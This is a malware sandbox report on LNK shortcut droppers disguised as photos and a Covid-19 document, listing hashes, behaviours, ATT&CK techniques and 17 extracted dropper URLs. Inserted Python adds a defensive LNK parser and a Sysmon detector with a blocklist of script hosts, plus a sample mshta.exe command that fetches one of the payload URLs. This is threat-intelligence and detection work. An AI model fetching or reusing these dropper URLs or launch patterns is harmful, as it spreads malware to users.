General

  • Target

    1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

  • Size

    695KB

  • Sample

    220322-pth4vsfah3

  • MD5

    25e76e7b8fd0132f44d1ef708d0ed023

  • SHA1

    7346c14c42da80ccdfcb210aaac8ecd861b5511a

  • SHA256

    1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

  • SHA512

    1b0d2154449bdf4d7b362d8c17f9c6cf4e424b36825111ae1d2c955ad27bd5cf218e280747c4c3f6bbf66705b8eff262213a35c5590273b9d4cf1280e9357a1f

Score
10/10

Malware Config

Extracted (17 hta.dropper configurations, listed in report order)

Language
hta
Source
URLs
hta.dropper

https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css
https://inapharma.in/css/files/awanda/http/
https://inapharma.in/css/files/photos/Radhika-Images/Image1
https://inapharma.in/css/files/photos/Radhika-Images/Image2
https://inapharma.in/css/files/photos/Radhika-Images/Image3
https://inapharma.in/css/files/photos/Radhika-Images/Image4
https://inapharma.in/css/files/photos/Radhika-Images/Image5
https://inapharma.in/css/files/photos/Radhika-Images/Image6
https://inapharma.in/css/files/photos/Radhika-Images/Image7
https://inapharma.in/css/files/photos/Radhika-Images/Image8
https://inapharma.in/css/files/photos/Sunakshi/IMG_20201220_211940
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210111_125841
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122317
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122331
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_105339
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_160548
https://inapharma.in/css/files/photos/Bn-Offrs-Album/Image-8646-ZP

Targets

    • Target

      samples/Assignment-Covid-19.docx.lnk

    • Size

      441KB

    • MD5

      46a0ed16f446c9d5c948c0df1913760a

    • SHA1

      2bda2bb80eb79574eecff90ebcc8579e29f310b9

    • SHA256

      2ace3b4ea7ecacb6ef8b4da7f5c315a31663523808a685d3600bc57571c1eb83

    • SHA512

      a888521af25310f40074230056d14e2f73725e34b1b364ff751220bce5ef22a4fdc52ea83f1b7a0c17a8b94c7c4cb714bfbfbe02ee9c7c8ed6b358adf3f7921c

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Adds Run key to start application

    • Target

      samples/IMG20100510171450.jpg.lnk

    • Size

      1KB

    • MD5

      9eae344a255251254eb236a5b87b5790

    • SHA1

      72c8a2c84598ed2b394635ed36a253edf46a8f44

    • SHA256

      b55cd403d53f483d55f015e8fb884cc203f93af81b0ef6de9e1809647a17478f

    • SHA512

      e12e47eda16b5c1e0d115af95f5e6ee82718ba1f1b2650a5cd0add92cefe97050d16b799c283050fce456cbbf828bbf29cdcddddad4c90ae141b9e08ba51bb4a

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20100510223001.jpg.lnk

    • Size

      1KB

    • MD5

      cf6a968486a4215213c137536a6b5838

    • SHA1

      78821673dca4dd90b71e64aa61e40e010f07a22b

    • SHA256

      41350960c79e404fd6127c6cfd0951e948e7743073d58fbd767818c6353b269a

    • SHA512

      2ffea4638f422500ab42033851fa70f8d7b784a8dce757610275d4de1cd92f16b4e03b413e37f1e492871def8c91babb8c376fe20d84f003e3ed34f2d9fa77c3

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20201210342791.jpg.lnk

    • Size

      1KB

    • MD5

      41396dd603a7598248982c1e6ee99a80

    • SHA1

      538a54194158fc8ebd3abf26065fc6bee58c62ba

    • SHA256

      4e72308cf647e89c22a85af9dee015d38a86baf170304c4e468b486aaaf9dc31

    • SHA512

      156ce4616979b4ee1e08a35f468e657908f82c0b81ae1ab8e3d9f2f173ae50f0a122f9e568b953af641cb26cefbaf2e85e33c26d9dfe5552a8353b91ab3a95dc

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20210588270623.jpg.lnk

    • Size

      1KB

    • MD5

      18b3f8fb699d04f17a3d6b20061d3d24

    • SHA1

      35dc4dd6379582e21bc102c9fccd4a6c836b7040

    • SHA256

      2f2b6cc258b82a24fb42e8b0528a63226f8e06c15b2f851fad6db87024b01ed3

    • SHA512

      22015058707c39b357aba7ac21cc3e5ef9af5635d39987ae0d91e143f456baeb8844f76a0bc265608d8b5b7def2884ee36ba8c496be3b41736f65f62b16fb1bd

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20210713121548.jpg.lnk

    • Size

      1KB

    • MD5

      cac1f13a4f9670a5419a843d33f2bfd6

    • SHA1

      8239d0182e8d0aef620a9cc6e4bd1bf9db075ea1

    • SHA256

      44d57154908461afb71eef59f25b56d56ac442cf70b58da2fd55cf5cee67f778

    • SHA512

      9bc7fafc0ffe7cd257f2d2a20eb10d27fb715193b158b04e3e547b8b499cda5b54c076b5af696248c03b28b7a408332c274e1b71ea649c664c6f9430a66c57f4

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20210743209813.jpg.lnk

    • Size

      1KB

    • MD5

      43061de1fc88a0aca42389eb10631a87

    • SHA1

      7625e3384837016583cda75aa42f340a396d2a12

    • SHA256

      4ddfde212867c4fafa535c2dbc24d4b289f7ec8b217e50b3208c0c4392426045

    • SHA512

      7f9760b16956c55e0a2c4ff228fcd76b1fc5aa5c24f31495b09cbc510b399fe06fe6e815ba1cc6e7651ffac019d7f6d063e4dbe4a7d9121db90fa32fc6c0effe

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20210911131002.jpg.lnk

    • Size

      1KB

    • MD5

      a242f83235676c39f387579d66cb5d2c

    • SHA1

      4f62159ff23b1be912a129b07e1dc5006576b3fb

    • SHA256

      8ad75311ad9aac9d04d3471b7b40ce2d0aeb7f5c6c7d86b29c24aef4d4bfc51b

    • SHA512

      81fd67a598dbe699860d701c78f1ea3f1ce30d4a2066060e4f5497c21538152222759ab791cc3be95f2adc60fba1ddc1cb6e35b8a0e0099ecad92b08e1794ce9

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG20210918232755.jpg.lnk

    • Size

      1KB

    • MD5

      999ee25489b213fbfe71a1ac2bd1de42

    • SHA1

      970967db603ad1095c5a4f98a5fa019ad323bf28

    • SHA256

      f9466a54fb75d5084ee6ab6b5d667250c6aaaa710b325500a5f5435ba5fe9384

    • SHA512

      eee0f65fc65ad43ecc75f61d07d9cd2fe9ec0e4a5b46a6b32ac61e506427bcf5e421b13a307a404f8e74c586d07531ab7e7acb5b0cf17288b28658e8563c676c

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20201220_211940.jpg.lnk

    • Size

      61KB

    • MD5

      4719d38df44b6adaf747e9e5393a42a2

    • SHA1

      75bee47db44cc3d49fb89961c5d56850d730c8ef

    • SHA256

      426a772c292688f492a2d5e0123be9112162654de8e06cdfbb6be60138ef20fc

    • SHA512

      8a93396d69609032775b99973d9ffaf2455ba11975ce96fc9e716689b507add46ac613895943c734654c73e9f3bf04877ca7db8baa59d3ee47f61e506107f06e

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20210111_125841.jpg.lnk

    • Size

      29KB

    • MD5

      0cc31107c3424949102a31bddedfe867

    • SHA1

      585571b2214b18ea0c17f5fe299abae3cdebc15e

    • SHA256

      3ff6bcb1912539579eb728e06e32ec4299b62b95a3000e93e4840d669b1e29ef

    • SHA512

      b6bb60215a5525f37b08fc5b1dea758167fa7184c2bb15f8c198ead5732ac15f14e5c1e176034e4fc2b5b56f6ad1b0a0aea5139fa83da80b079cc113dc7d3980

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20210603_122317.jpg.lnk

    • Size

      24KB

    • MD5

      041652e37aa0448a2557855f1af38298

    • SHA1

      820a817a74e73acb25ea8a567f11b47e608d88de

    • SHA256

      ec5ce96649dc44602aad947047b13df8bb43da9cdfdd0d8d7c25c48e41fea200

    • SHA512

      10ceba0c348089c28fd76d4e9d02d6876ce19cb15b971ac1faca6ef26a8d4509c80ab6ebcd599b31cf56e64384b1bab0e06b3c2ad7a642937c321a493dff274d

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20210603_122331.jpg.lnk

    • Size

      54KB

    • MD5

      90b67f8679b286aeffb338090998d609

    • SHA1

      a4448457b6950f1337da0dbf973b96f316b405c2

    • SHA256

      b09ec2c531dce3b866bbb5b8945e6cb049b12b3c092e23213c51beb1e1db9fb3

    • SHA512

      8c9c4ce4270a0c1e6818811f345acc41e546dc16e212f9f190b1a502fba81bed8a1b8c3b9b8077205457cfd240128a67b1bf50200a3df3126c5c31a624a8fa14

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20210628_105339.jpg.lnk

    • Size

      88KB

    • MD5

      b6f35bc00581d77723bbee101e288077

    • SHA1

      35cc34c9942595b187c0beeda83c0b0f3a1babb1

    • SHA256

      64beb3e30dccf26b3a3f131180b88fefa48549d4ae7e6190b1de605f9b3974f0

    • SHA512

      f38aa1d1f54307b4d0969022fcfb17f7ef52b6302550f09905feca3c12a43fa24662ee660b23dc0abd74db80b64f083c788562dca2f09bc7f54fef2e837ff13c

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/IMG_20210628_160548.jpg.lnk

    • Size

      23KB

    • MD5

      eef19079fc52533b1439b4dfc7bd57b3

    • SHA1

      ef93d5185addc5fc51aea0c431e1a08abbb105c3

    • SHA256

      a293e19f25b2b5189b5a8885867552c88ea11f454f2656b8c32931fe116743d6

    • SHA512

      de9469c3406c262521230a1e1c4bb3315ce0f46535cdb9f89a18c77444f0b7c78864ecccd2cbbad47deb7dd9d9431f5eddac0372480773e064d37b048f6399f7

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Target

      samples/Image-8646-ZP.jpg.lnk

    • Size

      1KB

    • MD5

      e163fbce2507c89a106c8ad001dc099a

    • SHA1

      afd8e902f55dbefcfa4afa30c95ce49b2daef6aa

    • SHA256

      61e88158da4636ab0c11db75e376f42e11a02ebe0387223934fb10944b52794f

    • SHA512

      a6dc129fd6cfc820461b29c3b9c35539f7bd45e67a383c1cb8c9a437509046edac793dd6b134a379b3be1768dc3daba0ea5d914be5624a4c10a4402d32d99b82

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.
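Every target in this report is a .lnk file, and the hta.dropper URLs in the Malware Config section are what those shortcuts fetch, but the report does not show the shortcut contents themselves. The parser below is added here as an example; it is not code from the report or from the sandbox. It walks the [MS-SHLLINK] header, skips the optional LinkTargetIDList and LinkInfo structures, and decodes the StringData entries, so an analyst can recover the target path and command-line arguments (and any URL in them) from a 1 KB shortcut without running it. The shortcut it builds for its own test is constructed; the mshta.exe target and the example.invalid URL in it are assumptions for illustration, not values recovered from these samples.

```python
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

# ShellLinkHeader constants ([MS-SHLLINK] 2.1): fixed 76-byte header, fixed
# LinkCLSID, and the LinkFlags bits that say which optional parts follow.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


@dataclass
class LnkStrings:
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def is_lnk(data: bytes) -> bool:
    """True if the buffer starts with a well-formed ShellLinkHeader."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> LnkStrings:
    """Skip LinkTargetIDList and LinkInfo, then decode the StringData block."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:        # 2-byte IDListSize, then the IDList itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:      # 4-byte LinkInfoSize, which counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)

    def read_string() -> str:
        nonlocal off
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        if len(raw) != nbytes:
            raise ValueError("truncated StringData")
        off += nbytes
        return raw.decode("utf-16-le" if unicode else "cp1252")

    out = LnkStrings()
    # StringData entries appear in this fixed order, each only if its flag is set.
    if flags & HAS_NAME:
        out.name = read_string()
    if flags & HAS_RELPATH:
        out.relative_path = read_string()
    if flags & HAS_WORKDIR:
        out.working_dir = read_string()
    if flags & HAS_ARGS:
        out.arguments = read_string()
    if flags & HAS_ICON:
        out.icon_location = read_string()
    return out


def extract_urls(strings: LnkStrings) -> List[str]:
    """Collect URLs from every recovered string; arguments are the usual carrier."""
    found: List[str] = []
    for value in (strings.arguments, strings.relative_path, strings.working_dir,
                  strings.name, strings.icon_location):
        if value:
            found.extend(URL_RE.findall(value))
    return found


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed test input: a minimal Unicode .lnk with a dummy IDList,
    a RelativePath and CommandLineArguments. Not one of the report's samples."""
    flags = HAS_IDLIST | HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    item = struct.pack("<H", 5) + b"\x1f\x00\x00"      # one ItemID (size + data)
    id_list = item + struct.pack("<H", 0)               # TerminalID closes the list
    body = struct.pack("<H", len(id_list)) + id_list

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return (header + body + string_data(relative_path) + string_data(arguments)
            + struct.pack("<I", 0))                     # ExtraData terminator


if __name__ == "__main__":
    # Hypothetical target and URL, chosen for illustration only.
    sample = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       "https://example.invalid/css/files/photos/Image1")
    parsed = parse_lnk(sample)
    print(parsed.relative_path, parsed.arguments, extract_urls(parsed))
```

On a real sample, read the file in binary mode and pass the bytes to parse_lnk; anything the parser rejects (wrong header size or CLSID) is not a shortcut at all and deserves a closer look. ExtraData blocks after StringData are left unparsed here, so a shortcut that carries its payload in an EnvironmentVariableDataBlock or a trailing overlay would need the parser extended.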

MITRE ATT&CK Matrix ATT&CK v6

Persistence
  • Registry Run Keys / Startup Folder (T1060): 1

Defense Evasion
  • Modify Registry (T1112): 32
  • Install Root Certificate (T1130): 15

Discovery
  • Query Registry (T1012): 17
  • System Information Discovery (T1082): 33
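The two signatures repeated on every target, "Blocklisted process makes network request" and "Checks computer location settings" (the latter mapped above under Discovery as T1012 Query Registry), translate to host telemetry very differently. An outbound connection from a script host is visible in endpoint logs. The geofence check is a registry value read, which Sysmon does not record at all (Event IDs 12, 13 and 14 cover key create/delete, value set and rename), so that finding stays with the sandbox and static analysis. The Python below is added as an example and is not part of the report: it correlates Sysmon-style process-create (Event ID 1) and network-connect (Event ID 3) records on ProcessGuid, alerts on any connection from a blocklist of script and LOLBin hosts, and marks whether the destination is one of the hosts in this report's hta.dropper URLs. The event records are constructed; the blocklist itself and the use of mshta.exe in the sample are this example's assumptions, since the report only says "blocklisted process" and does not name it.

```python
from typing import Any, Dict, List

# Script and LOLBin hosts that rarely need a socket on an end-user workstation.
# The set is this example's assumption; the report only says "blocklisted process".
BLOCKLISTED_IMAGES = {
    "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe",
    "rundll32.exe", "certutil.exe", "msiexec.exe", "bitsadmin.exe",
}

# Hostnames taken from the hta.dropper URLs listed in this report.
KNOWN_DROPPER_HOSTS = {"inapharma.in", "www.inapharma.in"}

Event = Dict[str, Any]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events: List[Event]) -> List[Dict[str, Any]]:
    """Join Sysmon Event ID 1 (process create) with Event ID 3 (network connect)
    on ProcessGuid and alert on any blocklisted image that opens a connection.
    A connect with no matching create still alerts; its parent is just unknown."""
    creates: Dict[str, Event] = {}
    alerts: List[Dict[str, Any]] = []
    for ev in events:
        if ev["EventID"] == 1:
            creates[ev["ProcessGuid"]] = ev
            continue
        if ev["EventID"] != 3:
            continue
        image = image_name(ev["Image"])
        if image not in BLOCKLISTED_IMAGES:
            continue
        create = creates.get(ev["ProcessGuid"], {})
        parent = image_name(create.get("ParentImage", "")) or None
        host = ev.get("DestinationHostname", "").lower()
        alerts.append({
            "image": image,
            "parent": parent,
            "command_line": create.get("CommandLine"),
            "destination": host or ev.get("DestinationIp"),
            "port": ev.get("DestinationPort"),
            "known_dropper_host": host in KNOWN_DROPPER_HOSTS,
            # explorer.exe as parent is what a double-clicked .lnk looks like
            "launched_from_shell": parent == "explorer.exe",
        })
    return alerts


# Constructed events, not taken from the report. The mshta.exe command line and
# the firefox/regsvr32 entries exist only to exercise the three code paths.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "ProcessGuid": "{a1}", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://inapharma.in/css/files/photos/Radhika-Images/Image1"},
    {"EventID": 3, "ProcessGuid": "{a1}", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationHostname": "inapharma.in", "DestinationIp": "203.0.113.10",
     "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{b2}", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "firefox.exe"},
    {"EventID": 3, "ProcessGuid": "{b2}", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "www.example.org", "DestinationIp": "203.0.113.20",
     "DestinationPort": 443},
    # connect with no matching create (log gap or process started before logging)
    {"EventID": 3, "ProcessGuid": "{c3}", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 80},
]


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The browser connection is ignored, the mshta.exe connection is flagged with both the known-host match and the explorer.exe parent set, and the regsvr32.exe connection is flagged with an unknown parent rather than dropped. Matching on hostname only works when Sysmon's DNS lookup resolved one; fall back to the destination IP and a resolver log when it did not.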

Tasks

static1: Score N/A
behavioral1: Score 10/10
behavioral2 (persistence): Score 10/10
behavioral3: Score 10/10
behavioral4: Score 10/10
behavioral5: Score 10/10
behavioral6: Score 10/10
behavioral7: Score 10/10
behavioral8: Score 10/10
behavioral9: Score 10/10
behavioral10: Score 10/10
behavioral11: Score 10/10
behavioral12: Score 10/10
behavioral13: Score 10/10
behavioral14: Score 10/10
behavioral15: Score 10/10
behavioral16: Score 10/10
behavioral17: Score 10/10
behavioral18: Score 10/10
behavioral19: Score 10/10
behavioral20: Score 10/10
behavioral21: Score 10/10
behavioral22: Score 10/10
behavioral23: Score 10/10
behavioral24: Score 10/10
behavioral25: Score 10/10
behavioral26: Score 10/10
behavioral27: Score 10/10
behavioral28: Score 10/10
behavioral29: Score 10/10
behavioral30: Score 10/10
behavioral31: Score 10/10
behavioral32: Score 10/10